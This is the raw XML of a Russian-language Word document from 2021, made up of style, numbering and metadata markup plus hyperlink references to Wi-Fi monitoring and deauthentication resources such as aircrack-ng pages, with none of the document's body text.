      <w:pgNumType w:start="1"/>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A4A0F" w14:textId="77777777" w:rsidR="00C27CBA" w:rsidRDefault="000C0E85">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3F27F598" w14:textId="77777777" w:rsidR="00C27CBA" w:rsidRDefault="000C0E85">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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339D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2466B68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50300CAB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="592A04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2B73868"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79F89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0E1872"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E322437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57C50"/>
    <w:rsid w:val="00043D4B"/>
    <w:rsid w:val="0005278B"/>
    <w:rsid w:val="000658ED"/>
    <w:rsid w:val="00086298"/>
    <w:rsid w:val="000A3308"/>
    <w:rsid w:val="000C0E85"/>
    <w:rsid w:val="000C36E8"/>
    <w:rsid w:val="000D7087"/>
    <w:rsid w:val="000D71EC"/>
    <w:rsid w:val="000E3C22"/>
    <w:rsid w:val="001665E2"/>
    <w:rsid w:val="00263E2A"/>
    <w:rsid w:val="002D4F6B"/>
    <w:rsid w:val="003700FD"/>
    <w:rsid w:val="003F7840"/>
    <w:rsid w:val="004059FC"/>
    <w:rsid w:val="00447EAA"/>
    <w:rsid w:val="00457C50"/>
    <w:rsid w:val="004679B1"/>
    <w:rsid w:val="004C5B0D"/>
    <w:rsid w:val="005460CC"/>
    <w:rsid w:val="006555D1"/>
    <w:rsid w:val="00691AC1"/>
    <w:rsid w:val="00752B7C"/>
    <w:rsid w:val="00772A5B"/>
    <w:rsid w:val="007A6CA8"/>
    <w:rsid w:val="007C75BD"/>
    <w:rsid w:val="007D24B0"/>
    <w:rsid w:val="008B1C84"/>
    <w:rsid w:val="008D095A"/>
    <w:rsid w:val="00950AE1"/>
    <w:rsid w:val="009708B5"/>
    <w:rsid w:val="00A211B8"/>
    <w:rsid w:val="00AE2507"/>
    <w:rsid w:val="00B30CD1"/>
    <w:rsid w:val="00B52A5F"/>
    <w:rsid w:val="00BF7BC9"/>
    <w:rsid w:val="00C0341F"/>
    <w:rsid w:val="00C713FB"/>
    <w:rsid w:val="00CB3331"/>
    <w:rsid w:val="00CD3491"/>
    <w:rsid w:val="00CF2CAE"/>
    <w:rsid w:val="00DC1B5E"/>
    <w:rsid w:val="00ED306C"/>
    <w:rsid w:val="00F0269F"/>
    <w:rsid w:val="00F1465A"/>
    <w:rsid w:val="00F319B2"/>
    <w:rsid w:val="00F3737A"/>
    <w:rsid w:val="00F72E10"/>
    <w:rsid w:val="00FB0E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B502"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F1DF746F-29D4-4E41-AF61-DA7A9E080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331"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:eastAsia="Liberation Serif" w:hAnsi="Liberation Serif" w:cs="Liberation Serif"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:aliases w:val="1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00CB3331"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Mangal"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="29"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00CB3331"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="80"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>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TimesNewRoman"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="003F7840"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:aliases w:val="1 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00CB3331"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Mangal"/>
      <w:b/>
      <w:szCs w:val="29"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00CB3331"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:eastAsia="Liberation Serif" w:hAnsi="Liberation Serif" w:cs="Liberation Serif"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CB3331"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00CB3331"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00043D4B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Mangal"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CB333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aircrack-ng.org/doku.php?id=deauthentication" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@brannondorsey/wi-fi-is-broken-3f6054210fa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hackware.ru/?p=74"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freecodecamp.org/news/tracking-analyzing-over-200-000-peoples-every-step-at-mit-e736a507ddb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frdmtoplay.com/counting-wireless-devices-on-a-raspberry-pi-with-tcpdum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aircrack-ng.org/doku.php?id=airmon-ng"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rncciew.com/2014/10/27/cwap-802-11-probe-requestresponse/"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24</Pages>
  <Words>3201</Words>
  <Characters>18249</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>152</Lines>
  <Paragraphs>42</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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Мельников</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Александр Мельников</cp:lastModifiedBy>
  <cp:revision>47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-21T13:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-21T14:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>